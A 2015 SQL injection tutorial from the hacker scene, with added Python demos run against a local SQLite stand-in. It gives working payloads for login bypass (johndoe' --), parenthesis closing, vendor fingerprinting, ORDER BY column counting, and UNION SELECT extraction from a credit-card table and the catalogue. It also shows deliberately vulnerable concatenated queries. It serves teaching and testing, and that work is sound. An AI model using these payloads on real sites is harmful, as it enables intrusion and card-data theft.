Posted on 11-Jun-2015


Structured Query Language Injection

SQL Injection Tutorial, Second Release, by Dangerous Wolf

Thanks to: James Marshall, top admin of the "Astalavista Security Committee"; Adrian Lamo of the "H4G1S Destroying Group", who became a white hat; Zinho, top admin of the "Hackers Center Committee"; Steve Example, Gold Member of "Unix Wizard"; IDESpinner, top admin of the "Cracking Is Life" cracking team; Ali Rashidi, top admin of the "Crouz Security Team".

Page 1 of 77

SQL Injection Tutorial by Dangerous Wolf

1: Web Applications

Web applications serve dynamic content: front-end scripts take input from the browser, build an SQL query from it and run that query against the web data store, whatever database platform sits behind the site. When user input flows into the query text unchecked, the attacker controls part of the query and can hijack the web application; the real target is then no longer the script but the database server, which holds the valuable data such as credit-card (CC) information. The database servers most often found behind web applications are Microsoft SQL Server (MSSQL) and Oracle, which between them hold most of the market, and neither is free of bugs; both are covered here.


2: SQL Injection

SQL injection is the manipulation of the SQL statements an application sends to its database, achieved by supplying input that the application pastes into those statements without treating it as data.

Finding the injection point. When input breaks the SQL syntax (a single quote is the usual culprit), the database raises an exception, and how the web application handles it decides what the tester sees. Some applications let the exception straight through the web server as a '500: Internal Server Error'. Others catch it in the application code and replace the text with an HTML message, answer 200 with the message replaced, or redirect to an error page. Compare two applications, A and B, both of which serve proddetails.asp and take a ProdID parameter. For a valid ProdID both return the product details. For an invalid ProdID, application A inserts the ID into its query and then tries to read the empty recordset, which throws an exception and surfaces as '500: Internal Server Error'; application B checks that the recordset has 0 rows and reports 'No such Product'.

Now send a ProdID containing a quote. Both applications hit an SQL syntax error. In application A that error is indistinguishable from an invalid ProdID, because both end as a 500. In application B the 500 stands out against the 'No such Product' message that every other invalid value produces, so the SQL error, and with it the injection point, is plainly visible. The application's normal reaction to invalid input is the baseline against which SQL errors are recognised.

Some applications defend against SQL injection by rejecting input that contains SQL keywords such as OR and AND, or meta-characters such as ; and '. Others answer every error with a redirect; an intercepting proxy shows the response that triggers the redirect and the exact request the application saw. In every case the injection has to be syntactically valid SQL before anything happens, so the first task is to find an input that the application accepts as valid yet passes into the query. An application usually has many parameters that end up in SQL; with a working error signal one can take the pick of the litter and exploit the one that is easiest to work with.

Every parameter that lands in an SQL statement has a type: Number, String or Date. The type decides how the web application writes the value into the SQL query and therefore how the injection must look. A number is written as-is, whereas a string such as 'abc' is wrapped in single quotes, so a numeric ProdID of 4 produces:

SELECT * FROM Products WHERE ProdID = 4


whereas a ProdName of Book produces:

SELECT * FROM Products WHERE ProdName = 'Book'

Both forms can be probed without provoking any error. For numeric fields, SQL Server (like any SQL database) evaluates basic arithmetic, so the request /myecommercesite/proddetails.asp?ProdID=4 can be repeated as ProdID=1+3. The two statements the application runs are

(1) SELECT * FROM Products WHERE ProdID = 4
(2) SELECT * FROM Products WHERE ProdID = 1 + 3

If both return the same product (ProdID 4), the value was placed into the SQL unchanged and injection is confirmed; an application that validated the parameter would have rejected 1+3 as an invalid ID. For string fields the first step is breaking out of the quote, and the error-free probe is string concatenation, whose syntax is vendor-specific: + on Microsoft SQL Server, || on Oracle. Request /myecommercesite/proddetails.asp?ProdName=Book, then ProdName=B' + 'ook (B' || 'ook for Oracle):

(1) SELECT * FROM Products WHERE ProdName = 'Book'
(2) SELECT * FROM Products WHERE ProdName = 'B' + 'ook'

Again both return the Book product. Because the concatenation operator differs between vendors, the probe that works also identifies the database, as do the built-in date functions (sysdate on Oracle, getdate() on SQL Server).
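The two error-free probes above, as an added example that is not part of the tutorial: a small Python model of proddetails.asp run against an in-memory SQLite database standing in for MSSQL/Oracle (SQLite concatenates with || like Oracle). The Products rows, the function names and the parameterised counterpart are all constructed here, not taken from the page.

```python
import sqlite3

# Constructed sample data standing in for the tutorial's Products table.
PRODUCTS = [(1, "Pen"), (2, "Paper"), (3, "Stapler"), (4, "Book")]


def make_db():
    """In-memory SQLite stand-in for the e-commerce site's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Products (ProdID INTEGER, ProdName TEXT)")
    conn.executemany("INSERT INTO Products VALUES (?, ?)", PRODUCTS)
    return conn


def proddetails_vulnerable(conn, prod_id=None, prod_name=None):
    """Models proddetails.asp: the parameter is pasted into the query text.
    A numeric parameter is written bare, a string parameter inside quotes."""
    if prod_id is not None:
        sql = "SELECT ProdID, ProdName FROM Products WHERE ProdID = " + prod_id
    else:
        sql = "SELECT ProdID, ProdName FROM Products WHERE ProdName = '" + prod_name + "'"
    return conn.execute(sql).fetchall()


def proddetails_safe(conn, prod_id=None, prod_name=None):
    """Same endpoint with bind parameters: the input stays data, never SQL."""
    if prod_id is not None:
        sql = "SELECT ProdID, ProdName FROM Products WHERE ProdID = ?"
        return conn.execute(sql, (prod_id,)).fetchall()
    sql = "SELECT ProdID, ProdName FROM Products WHERE ProdName = ?"
    return conn.execute(sql, (prod_name,)).fetchall()


def probe_injection(conn, endpoint):
    """The tutorial's error-free probes: 1+3 for a numeric field and a broken,
    re-concatenated string for a string field. Injection is present when the
    probe returns exactly the rows the plain value returns. SQLite concatenates
    with || like Oracle; against MS SQL Server the string probe is B' + 'ook."""
    numeric_base = endpoint(conn, prod_id="4")
    numeric_probe = endpoint(conn, prod_id="1+3")
    string_base = endpoint(conn, prod_name="Book")
    string_probe = endpoint(conn, prod_name="B'||'ook")
    return {
        "numeric": bool(numeric_base) and numeric_probe == numeric_base,
        "string": bool(string_base) and string_probe == string_base,
    }


if __name__ == "__main__":
    db = make_db()
    print("concatenated query:", probe_injection(db, proddetails_vulnerable))
    print("parameterised query:", probe_injection(db, proddetails_safe))
```

Against the concatenated query both probes come back identical to the baseline rows; against the parameterised version the bound text '1+3' and the literal string B'||'ook match nothing, so the probes report no injection without a single error message on either side.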


Working out the syntax blindfolded

Once the point of injection is known, the next thing needed is the syntax of the statement being injected into, and with no error text to read this has to be worked out blindfolded, from the application's reactions. Most injections land in the WHERE clause of a SELECT, so the tester's input is appended to an existing condition. The textbook probe is OR 1=1, which makes the WHERE clause true for every row; many applications recognise and block exactly this string, but the logically equivalent tests AND 1=2 (always false) and OR 1=2 (no change) serve just as well. Whichever is used, the precedence of AND over OR inside the WHERE clause must be kept in mind, since it decides which part of the original condition the injected term attaches to. A UNION SELECT can likewise be appended after the WHERE clause. Whatever follows the injection point in the original statement is dealt with by a comment: on SQL Server, -- makes the database ignore everything after it on the line. The classic example is a login form whose user name and password end up in

SELECT Username, UserID, Password FROM Users WHERE Username = 'user' AND Password = 'pass'

Entering the user name johndoe' -- turns the WHERE clause into

WHERE Username = 'johndoe' --' AND Password = 'pass'

The password check is now part of the comment, and the query returns johndoe's row without it.


The same bypass fails if the application wraps the condition in parentheses:

WHERE (Username = 'user' AND Password = 'pass')

Injecting johndoe' -- then gives

WHERE (Username = 'johndoe' --' AND Password = 'pass')

and the comment swallows the closing parenthesis, so the statement is invalid. Closing the parenthesis before the comment, johndoe') --, restores it. Parentheses in the original statement are invisible to the tester and have to be discovered exactly this way.

Once the syntax is clear the database itself can be identified, the two common ones being Oracle and Microsoft SQL Server. The string-concatenation test does this from inside the WHERE clause without any comment: appending AND 'xxx' = 'x' + 'xx succeeds only on MS SQL, and AND 'xxx' = 'x' || 'xx only on Oracle, while the trailing quote of the original statement closes the last literal. Stacking a second statement after ; (for example ; COMMIT) executes on MS SQL, whereas Oracle's drivers normally refuse more than one statement per call. The -- comment works on both. The built-in date functions give a second fingerprint:

getdate() on MS SQL, sysdate on Oracle
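The comment bypass, the parenthesis problem, the comment-less concatenation probe and the precedence point from this and the preceding section, as an added example that is not part of the tutorial. It runs the login query against an in-memory SQLite database (a stand-in for MSSQL/Oracle, using || for concatenation) and reports the two signals the blindfolded tester reads: a row set or a syntax error. The Users rows and function names are constructed here.

```python
import sqlite3

# Constructed Users table; clear-text passwords only to keep the model small.
USERS = [("johndoe", 1, "s3cret"), ("alice", 2, "hunter2")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (Username TEXT, UserID INTEGER, Password TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?, ?)", USERS)
    return conn


def login_vulnerable(conn, user, pwd, parenthesised=False):
    """Builds the tutorial's login query by concatenation. With parenthesised=True
    the WHERE clause is wrapped in parentheses, the variant that defeats a plain --."""
    cond = "Username = '" + user + "' AND Password = '" + pwd + "'"
    if parenthesised:
        cond = "(" + cond + ")"
    sql = "SELECT Username, UserID FROM Users WHERE " + cond
    return conn.execute(sql).fetchall()


def attempt(conn, user, pwd, parenthesised=False):
    """Returns ('ok', rows) or ('error', message): all the tester gets to see."""
    try:
        return ("ok", login_vulnerable(conn, user, pwd, parenthesised))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    db = make_db()
    # A bare quote breaks the syntax: the error that marks the injection point.
    print(attempt(db, "johndoe'", "x"))
    # The comment removes the password check entirely.
    print(attempt(db, "johndoe' --", "wrong"))
    # Same payload against a parenthesised WHERE: the comment eats the ')'.
    print(attempt(db, "johndoe' --", "wrong", parenthesised=True))
    # Close the parenthesis first and the bypass works again.
    print(attempt(db, "johndoe') --", "wrong", parenthesised=True))
    # Comment-less probe: stays valid SQL, the original trailing quote closes 'xx'.
    print(attempt(db, "johndoe' AND 'xxx'='x'||'xx", "s3cret"))
    # Precedence: AND binds before OR, so OR 'a'='a' matches every user.
    print(attempt(db, "nobody", "x' OR 'a'='a"))
```

The comment-less probe returns johndoe's row only with the right password, so it confirms the injection and the database vendor without bypassing anything; the OR variant shows why precedence matters, since the injected term attaches to the whole AND condition and makes the WHERE true for every row.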


3: UNION SELECT

The most useful construct for pulling data out of a database through an injection is UNION SELECT. It is appended after the WHERE clause of the application's own SELECT, so the application runs its query plus one chosen by the attacker and displays the combined record-set as though all of it came from the original table; any table the database user can read becomes reachable. UNION requires that both SELECTs return the same number of columns and that the column types match position by position, so the first obstacles are a Column Number Mismatch and a Column Type Mismatch, both of which have to be resolved without seeing the database's error text.

The number of columns can be found with ORDER BY. ORDER BY sorts the record-set of a SELECT and does not change which columns are returned, so appending it is harmless as long as the column it names exists. Take a credit-card lookup:

SELECT CCNum FROM CreditCards WHERE (AccNum=11223344 AND CardState='Active') AND UserName='johndoe'

Injecting 11223344) ORDER BY CCNum -- produces

SELECT CCNum FROM CreditCards WHERE (AccNum=11223344) ORDER BY CCNum -- AND CardState='Active') AND UserName='johndoe'


Column names are unknown, but ORDER BY also accepts the position of a column in the SELECT list. 11223344) ORDER BY 1 -- sorts by the first column and always succeeds; 11223344) ORDER BY 2 -- succeeds only if a second column exists, and so on. The first position that produces an error is one past the number of columns. The effect is often visible in the application too, since the displayed records change order (ASC by default, DESC if requested), which helps when errors are hidden. Walking ORDER BY 1, 2, 3 ... up to 100 or so covers any realistic SELECT.

Column types are harder. Brute-forcing them is unattractive: with three basic types and ten columns there are 3^10, roughly 60,000, combinations to try. The SQL keyword NULL is compatible with every column type and can therefore stand in for each column of the attacker's SELECT: UNION SELECT NULL, NULL, ... succeeds once the number of NULLs is right, whatever the types. Take the full credit-card query, which selects four columns:

SELECT CCNum,CCType,CCExp,CCName FROM CreditCards WHERE (AccNum=11223344 AND CardState='Active') AND UserName='johndoe'


Besides CCNum the query returns three more columns, four in all, so UNION SELECT NULL,NULL,NULL,NULL is needed. Two details of the injected SELECT matter. First, the FROM clause: MS SQL allows a SELECT with no FROM at all, but Oracle requires one, and the table to name there is DUAL, which every Oracle user can read; selecting from any other table risks a Permission Error, and permission issues have to be handled separately from the column-count problem. Second, a WHERE 1=2 on the injected SELECT leaves its record-set empty, so the UNION adds no rows, the application never has to display a NULL and its page looks exactly as before. For MS SQL Server the payload is 11223344) UNION SELECT NULL,NULL,NULL,NULL WHERE 1=2 -- (on Oracle add FROM DUAL before the WHERE), which yields

SELECT CCNum,CCType,CCExp,CCName FROM CreditCards WHERE (AccNum=11223344) UNION SELECT NULL,NULL,NULL,NULL WHERE 1=2 -- AND CardState='Active') AND UserName='johndoe'

If the column count is not already known from ORDER BY, start with a single NULL and add one per request until the error disappears, up to a hundred or so. Where a FROM is mandatory, use the vendor-specific table name (DUAL on Oracle) and keep the NULLs in place.
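The ORDER BY column count and the UNION SELECT NULL confirmation from this and the preceding section, as an added example that is not part of the tutorial, carried one step further than the text: once the count is known the NULLs are swapped for real columns to read the catalogue. It runs against an in-memory SQLite database standing in for MSSQL/Oracle; the CreditCards rows and function names are constructed here, and sqlite_master plays the part of the vendor-specific catalogue table.

```python
import sqlite3

# Constructed CreditCards rows: the four columns the tutorial's query returns
# plus the three its WHERE clause filters on.
CARDS = [
    ("4111111111111111", "Visa", "12/09", "John Doe", 11223344, "Active", "johndoe"),
    ("5500000000000004", "MasterCard", "06/08", "Alice Smith", 99887766, "Active", "alice"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE CreditCards (CCNum TEXT, CCType TEXT, CCExp TEXT,"
                 " CCName TEXT, AccNum INTEGER, CardState TEXT, UserName TEXT)")
    conn.executemany("INSERT INTO CreditCards VALUES (?, ?, ?, ?, ?, ?, ?)", CARDS)
    return conn


def cards_vulnerable(conn, acc_num):
    """The tutorial's query with AccNum pasted into a parenthesised condition."""
    sql = ("SELECT CCNum,CCType,CCExp,CCName FROM CreditCards"
           " WHERE (AccNum=" + acc_num + " AND CardState='Active') AND UserName='johndoe'")
    return conn.execute(sql).fetchall()


def count_columns(conn, endpoint, max_cols=100):
    """ORDER BY n: close the parenthesis, sort by the n-th column, comment out
    the rest. The first n that errors is one past the column count."""
    found = 0
    for n in range(1, max_cols + 1):
        try:
            endpoint(conn, "11223344) ORDER BY %d --" % n)
            found = n
        except sqlite3.OperationalError:
            break
    return found


def union_matches(conn, endpoint, n_cols):
    """UNION SELECT NULL,... WHERE 1=2: NULL fits every column type and 1=2 keeps
    the extra record-set empty, so a matching count returns the original rows
    unchanged. SQLite is dynamically typed, so the Column Type Mismatch error
    MS SQL and Oracle would raise for a wrong type cannot be shown here."""
    nulls = ",".join(["NULL"] * n_cols)
    try:
        rows = endpoint(conn, "11223344) UNION SELECT %s WHERE 1=2 --" % nulls)
    except sqlite3.OperationalError:
        return False
    return rows == endpoint(conn, "11223344")


def list_tables(conn, endpoint, n_cols):
    """Swap the first NULLs for real columns of the catalogue table. sqlite_master
    stands in for the vendor-specific table (sysobjects on MS SQL, all_tables on
    Oracle); the remaining positions stay NULL."""
    cols = ["name", "type"] + ["NULL"] * (n_cols - 2)
    payload = "11223344) UNION SELECT %s FROM sqlite_master --" % ",".join(cols)
    rows = endpoint(conn, payload)
    # The application's own card row comes back too; keep only catalogue rows.
    return sorted(r[0] for r in rows if r[1] == "table")


if __name__ == "__main__":
    db = make_db()
    n = count_columns(db, cards_vulnerable)
    print("columns:", n, "union with", n, "NULLs ok:", union_matches(db, cards_vulnerable, n))
    print("union with", n - 1, "NULLs ok:", union_matches(db, cards_vulnerable, n - 1))
    print("tables:", list_tables(db, cards_vulnerable, n))
```

Every request in the walk is one the application answers either normally or with its generic error page, which is all a blindfolded tester needs: ORDER BY 5 fails where ORDER BY 4 did not, the four-NULL UNION is indistinguishable from the plain lookup, and the three-NULL UNION is the Column Number Mismatch the text describes.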